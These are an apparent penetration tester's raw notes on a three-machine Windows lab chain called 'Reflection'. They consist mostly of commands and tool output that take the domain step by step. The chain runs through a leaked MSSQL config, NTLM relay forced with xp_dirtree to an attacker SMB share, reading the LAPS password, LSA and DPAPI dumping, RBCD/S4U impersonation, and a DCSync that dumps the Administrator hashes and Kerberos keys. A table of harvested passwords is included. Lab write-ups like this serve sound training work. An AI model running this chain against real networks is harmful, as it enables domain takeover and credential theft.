Reflection (Chain)
This is not a writeup, just my notes about the machine.
Operating System: Microsoft Windows Server 2022 Standard
Chain: True (3 Machines)
Credentials
Username
Password
Method
Scope
web_staging
Washroom510
Leaked on SMB Folder
Domain User/MSSQL on MS01
dev01
Initial123
MSSQL
User on MS01
dev02
Initial123
MSSQL
User on MS01
web_prod
Tribesman201
NTLM Relay
MSSQL user on DC01
abbie.smith
CMe1x+nlRaaWEw
MSSQL
Domain User
dorothy.rose
hC_fny3OK9glSJ
MSSQL
Domain User
Rhys.Garner
knh1gJ8Xmeq+uP
LSA
Domain User
✅ Valid Usernames
web_staging
dorothy.rose
abbie.smith
web_prod
Rhys.Garner🔑 Passwords list
Washroom510
Initial123
Tribesman201
CMe1x+nlRaaWEw
hC_fny3OK9glSJ
knh1gJ8Xmeq+uPInformation Gathering
Nmap scan
Nmap scan report for 10.10.241.133
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58981/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Nmap scan report for 10.10.241.134
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Nmap scan report for 10.10.241.135
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal ServicesService enumeration
10.10.241.133
SMB
Domain SID: S-1-5-21-3375389138-1770791787-1490854311
Netbios: DC01
FQDN: dc01.reflection.vl
Domain: reflection.vl
Parent DomainAllows null session authentication
signing: False
DNS
Not vulnerable to AXFR
10.10.241.134
SMB (enum4linux-ng)
Server allows null session authentication
Server allows guest session authentication
FQDN: ms01.reflection.vl
signing: False
10.10.241.135
SMB
FQDN: ws01.reflection.vl
signing: False
Compromising MS01
Discovering a valid credentials
❯ nxc smb 10.10.241.134 -u 'Intrusionz3r0' -p '' --shares -M spider_plus
SMB 10.10.241.134 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.241.134 445 MS01 [+] reflection.vl\Intrusionz3r0: (Guest)
SPIDER_PLUS 10.10.241.134 445 MS01 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.241.134 445 MS01 [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.241.134 445 MS01 [*] STATS_FLAG: True
SPIDER_PLUS 10.10.241.134 445 MS01 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.241.134 445 MS01 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.241.134 445 MS01 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.241.134 445 MS01 [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.241.134 445 MS01 [*] Enumerated shares
SMB 10.10.241.134 445 MS01 Share Permissions Remark
SMB 10.10.241.134 445 MS01 ----- ----------- ------
SMB 10.10.241.134 445 MS01 ADMIN$ Remote Admin
SMB 10.10.241.134 445 MS01 C$ Default share
SMB 10.10.241.134 445 MS01 IPC$ READ Remote IPC
SMB 10.10.241.134 445 MS01 staging READ staging environment
SPIDER_PLUS 10.10.241.134 445 MS01 [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.241.134.json".
SPIDER_PLUS 10.10.241.134 445 MS01 [*] SMB Shares: 4 (ADMIN$, C$, IPC$, staging)
SPIDER_PLUS 10.10.241.134 445 MS01 [*] SMB Readable Shares: 2 (IPC$, staging)
SPIDER_PLUS 10.10.241.134 445 MS01 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.241.134 445 MS01 [*] Total folders found: 0
SPIDER_PLUS 10.10.241.134 445 MS01 [*] Total files found: 1
SPIDER_PLUS 10.10.241.134 445 MS01 [*] File size average: 50 B❯ cat staging_db.conf
user=web_staging
password=Washroom510
db=staging% Connecting to MSSQL and discovering a valid user credentiales
❯ impacket-mssqlclient ms01.reflection.vl/web_staging:'Washroom510'@10.10.241.134
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (web_staging guest@master)> SQL (web_staging guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
-------
master
tempdb
model
msdb
staging
SQL (web_staging guest@master)> use staging;
SQL (web_staging dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
staging dbo users b'BASE TABLE'
SQL (web_staging dbo@staging)> select * from users
id username password
-- -------- -------------
1 b'dev01' b'Initial123'
2 b'dev02' b'Initial123'
SQL (web_staging dbo@staging)> NTLM Relay Attack via socks proxy
The previous enumeration indicated that some servers did not have SMB signing disabled, making them vulnerable to NTLM Relay attacks.
Setting up the ntlmrelayx tool to initiate a interactive shell.
❯ sudo impacket-ntlmrelayx -smb2support -t 10.10.241.133 -i
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connectionsTriggering the authentication to perform the relay
SQL (web_staging guest@master)> exec xp_dirtree '\\10.8.5.48\smbfolder'Output from impacket-ntlmrelayx tool.
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.241.134, attacking target smb://10.10.241.133
[*] Authenticating against smb://10.10.241.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000Downloading the database production user.
❯ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# ls
drw-rw-rw- 0 Wed Jun 7 13:44:26 2023 .
drw-rw-rw- 0 Wed Jun 7 13:43:22 2023 ..
-rw-rw-rw- 45 Thu Jun 8 07:24:39 2023 prod_db.conf
# get prod_db.conf
❯ catn prod_db.conf
user=web_prod
password=Tribesman201
db=prod% Discovering users credentiales on MSSQL table
❯ impacket-mssqlclient ms01.reflection.vl/web_prod:'Tribesman201'@10.10.241.133
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
SQL (web_prod guest@master)> SELECT name FROM master.dbo.sysdatabases;
prod
SQL (web_prod guest@master)> use prod;
SQL (web_prod dbo@prod)> select * from prod.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
prod dbo users b'BASE TABLE'
SQL (web_prod dbo@prod)> select * from users;
id name password
-- --------------- -----------------
1 b'abbie.smith' b'CMe1x+nlRaaWEw'
2 b'dorothy.rose' b'hC_fny3OK9glSJ'
SQL (web_prod dbo@prod)> Using a valid credentials the tester proceeded to enumerate the domain controler by using bloodhound.
Reading LAPS password on MS01
The user abbie.smith possesses GenericAll over MS01 which means the user can abuse of this machine using RBCD or reading the LDAP password. (RBCD was not possible due the MachineAccountQuota is 0)
❯ bloodyAD --dc-ip 10.10.241.133 -d reflection.vl -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' get object 'MS01$' --attr ms-Mcs-AdmPwd
distinguishedName: CN=MS01,OU=servers,DC=reflection,DC=vl
ms-Mcs-AdmPwd: H447.++h6g5}xiDumping DPAPI and LSA credentials on MS01
❯ nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --lsa
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB 10.10.210.214 445 MS01 [+] Dumping LSA secrets
<SNIF>
SMB 10.10.210.214 445 MS01 REFLECTION\svc_web_staging:DivinelyPacifism98 nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --dpapi
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB 10.10.210.214 445 MS01 [*] Collecting User and Machine masterkeys, grab a coffee and be patient...
SMB 10.10.210.214 445 MS01 [+] Got 10 decrypted masterkeys. Looting secrets...
SMB 10.10.210.214 445 MS01 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370} - REFLECTION\Georgia.Price:DBl+5MPkpJg5idCompromising WS01
Abusing Resource Based Constrained Delegation
❯ impacket-rbcd -delegate-from 'MS01$' -delegate-to 'WS01$' -action 'write' 'REFLECTION.vl/Georgia.Price:DBl+5MPkpJg5id'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] MS01$ (S-1-5-21-3375389138-1770791787-1490854311-1104)Requesting Ticket Granting Ticket via S4U
❯ impacket-getST -spn 'cifs/ws01.reflection.vl' -impersonate 'administrator' 'reflection.vl/MS01$' -hashes :c4b7d1086f04073b2b2f71cb075b3d52 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccacheAuthenticating into WS01 as NT Authority System
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-smbexec -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>Dumping SAM and LSA Secrets
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-secretsdump -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
<SNIF>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uPCompromising Domain Controller (DC01)
During the enumeration, the tester discovered a user named DOM_RGARNER, which looked similar to the previously obtained username, Rhys.Garner. The tester then proceeded to use NetExec to check the credentials.
❯ nxc smb 10.10.210.213-215 -u 'dom_rgarner' -p 'knh1gJ8Xmeq+uP'
SMB 10.10.210.215 445 WS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.213 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB 10.10.210.215 445 WS01 [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)
SMB 10.10.210.214 445 MS01 [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)
SMB 10.10.210.213 445 DC01 [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)Performing DCSync attack to compromise reflection.vl
❯ impacket-getTGT reflection.vl/dom_rgarner:'knh1gJ8Xmeq+uP'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in dom_rgarner.ccache❯ KRB5CCNAME='dom_rgarner.ccache' impacket-secretsdump -k -no-pass dc01.reflection.vl -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a87a3e893c70111c8cad0ecbda9f4002:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2d2ca00cb0d7484b07eba9b00937b9e8a537089e69bbd4a8551dbad0ecae5993
Administrator:aes128-cts-hmac-sha1-96:da61094f6772529865c6b58d0ac3e1df
Administrator:des-cbc-md5:34f23e130d7aa77fLast updated